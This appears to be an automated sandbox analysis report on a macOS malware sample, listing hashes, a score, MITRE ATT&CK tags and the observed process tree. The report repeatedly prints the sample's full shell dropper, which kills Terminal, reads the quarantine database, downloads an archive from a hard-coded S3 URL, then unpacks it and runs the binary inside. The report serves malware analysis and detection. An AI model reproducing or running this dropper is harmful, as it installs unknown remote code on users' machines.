b850cd121b76d1b1610a05fde0c7a11e3169f545617a5a5b0e7c440bd7b30944

Analysis

max time kernel
40s
max time network
142s
platform
macos-10.15_amd64
resource
macos-20241106-en
resource tags

arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
17/02/2025, 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006
Size

20KB
MD5

5b98da7c610614a0daadd5b137f2038b
SHA1

244aa58b53218f7ffe50e8abf84dde48eb110551
SHA256

07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006
SHA512

1771e1d4aa413e72f45d95e1b1b528c6ea47f0d6f01c2a12d5e8b464c253840617b46d12083bd7eca449229956036d1be29dfa8f9182575972220a96934eeb30
SSDEEP

384:RM4140hctqWfrS38dz/oxrkRZv3ywjpPmJIMkDpZUEG1+QS1:+yazDY8dzgmR7KkJx

Score

7^/10

exfiltration

Malware Config

Signatures

Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

exfiltration

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

ioc	Process
sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]\|\|[ \"\${param}\" == \"sidw\" ]\|\|[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/mktemp -d \"\$(dirname \"\${tgz_path}\")/\$(uuidgen)\");if tar -xzf \"\${tgz_path}\" -C \"\${app_dir}\";then echo \"\${app_dir}\";fi;rm -rf \"\${tgz_path}\";};app_path(){ local -r app_dir=\"\${1}\";[ -z \"\${app_dir}\" ]&&return;local -r app_paths=(\"\${app_dir}\"/?.app);local -r app_path=\"\${app_paths[0]}\";[ -d \"\${app_path}\" ]&&echo \"\${app_path}\";};bin_path(){ local -r app_path=\"\${1}\";[ -z \"\${app_path}\" ]&&return;local -r binary_paths=(\"\${app_path}/Contents/MacOS\"/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";local -r arch_path=\"\$(download \"\${url}\" \"\${tmp_dir}\")\";local -r app_dir=\"\$(unarchive \"\${arch_path}\")\";local -r app_path=\"\$(app_path \"\${app_dir}\")\";local -r bin_path=\"\$(bin_path \"\${app_path}\")\";exec_bin \"\${bin_path}\" \"\${did}\" \"\${app_path}\";rm -rf \"\${tmp_dir}\";};main \"https://ywdd6wfq.s3.amazonaws.com/Installer.app.tgz\"&"	Process not Found

ioc

Process

sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/mktemp -d \"\$(dirname \"\${tgz_path}\")/\$(uuidgen)\");if tar -xzf \"\${tgz_path}\" -C \"\${app_dir}\";then echo \"\${app_dir}\";fi;rm -rf \"\${tgz_path}\";};app_path(){ local -r app_dir=\"\${1}\";[ -z \"\${app_dir}\" ]&&return;local -r app_paths=(\"\${app_dir}\"/?*.app);local -r app_path=\"\${app_paths[0]}\";[ -d \"\${app_path}\" ]&&echo \"\${app_path}\";};bin_path(){ local -r app_path=\"\${1}\";[ -z \"\${app_path}\" ]&&return;local -r binary_paths=(\"\${app_path}/Contents/MacOS\"/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";local -r arch_path=\"\$(download \"\${url}\" \"\${tmp_dir}\")\";local -r app_dir=\"\$(unarchive \"\${arch_path}\")\";local -r app_path=\"\$(app_path \"\${app_dir}\")\";local -r bin_path=\"\$(bin_path \"\${app_path}\")\";exec_bin \"\${bin_path}\" \"\${did}\" \"\${app_path}\";rm -rf \"\${tmp_dir}\";};main \"https://ywdd6wfq.s3.amazonaws.com/Installer.app.tgz\"&"

Process not Found

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006\""
1⤵
PID:482

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006\""
1⤵
PID:482

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006
1⤵
PID:482
- /bin/zsh
  /bin/zsh -c /Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006
  2⤵
  PID:483
- /Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006
  /Users/run/Macos-Malware-Samples-main/07ba2f8c2575e1abf2f53ca10e4d0c9fedfba47f20eb99f67d0e4e2ad01dd006
  2⤵
  PID:483

/bin/sh
sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/mktemp -d \"\$(dirname \"\${tgz_path}\")/\$(uuidgen)\");if tar -xzf \"\${tgz_path}\" -C \"\${app_dir}\";then echo \"\${app_dir}\";fi;rm -rf \"\${tgz_path}\";};app_path(){ local -r app_dir=\"\${1}\";[ -z \"\${app_dir}\" ]&&return;local -r app_paths=(\"\${app_dir}\"/?*.app);local -r app_path=\"\${app_paths[0]}\";[ -d \"\${app_path}\" ]&&echo \"\${app_path}\";};bin_path(){ local -r app_path=\"\${1}\";[ -z \"\${app_path}\" ]&&return;local -r binary_paths=(\"\${app_path}/Contents/MacOS\"/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";local -r arch_path=\"\$(download \"\${url}\" \"\${tmp_dir}\")\";local -r app_dir=\"\$(unarchive \"\${arch_path}\")\";local -r app_path=\"\$(app_path \"\${app_dir}\")\";local -r bin_path=\"\$(bin_path \"\${app_path}\")\";exec_bin \"\${bin_path}\" \"\${did}\" \"\${app_path}\";rm -rf \"\${tmp_dir}\";};main \"https://ywdd6wfq.s3.amazonaws.com/Installer.app.tgz\"&"
1⤵
PID:484

/bin/bash
sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/mktemp -d \"\$(dirname \"\${tgz_path}\")/\$(uuidgen)\");if tar -xzf \"\${tgz_path}\" -C \"\${app_dir}\";then echo \"\${app_dir}\";fi;rm -rf \"\${tgz_path}\";};app_path(){ local -r app_dir=\"\${1}\";[ -z \"\${app_dir}\" ]&&return;local -r app_paths=(\"\${app_dir}\"/?*.app);local -r app_path=\"\${app_paths[0]}\";[ -d \"\${app_path}\" ]&&echo \"\${app_path}\";};bin_path(){ local -r app_path=\"\${1}\";[ -z \"\${app_path}\" ]&&return;local -r binary_paths=(\"\${app_path}/Contents/MacOS\"/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";local -r arch_path=\"\$(download \"\${url}\" \"\${tmp_dir}\")\";local -r app_dir=\"\$(unarchive \"\${arch_path}\")\";local -r app_path=\"\$(app_path \"\${app_dir}\")\";local -r bin_path=\"\$(bin_path \"\${app_path}\")\";exec_bin \"\${bin_path}\" \"\${did}\" \"\${app_path}\";rm -rf \"\${tmp_dir}\";};main \"https://ywdd6wfq.s3.amazonaws.com/Installer.app.tgz\"&"
1⤵
PID:484

/usr/bin/killall
killall Terminal
1⤵
PID:486

/usr/bin/sqlite3
/usr/bin/sqlite3 /Users/run/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 "SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1"
1⤵
PID:489

/usr/libexec/xpcproxy
xpcproxy com.apple.nsurlstoraged
1⤵
PID:490

/usr/libexec/nsurlstoraged
/usr/libexec/nsurlstoraged --privileged
1⤵
PID:490

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Exfiltration Over Alternative Protocol

T1048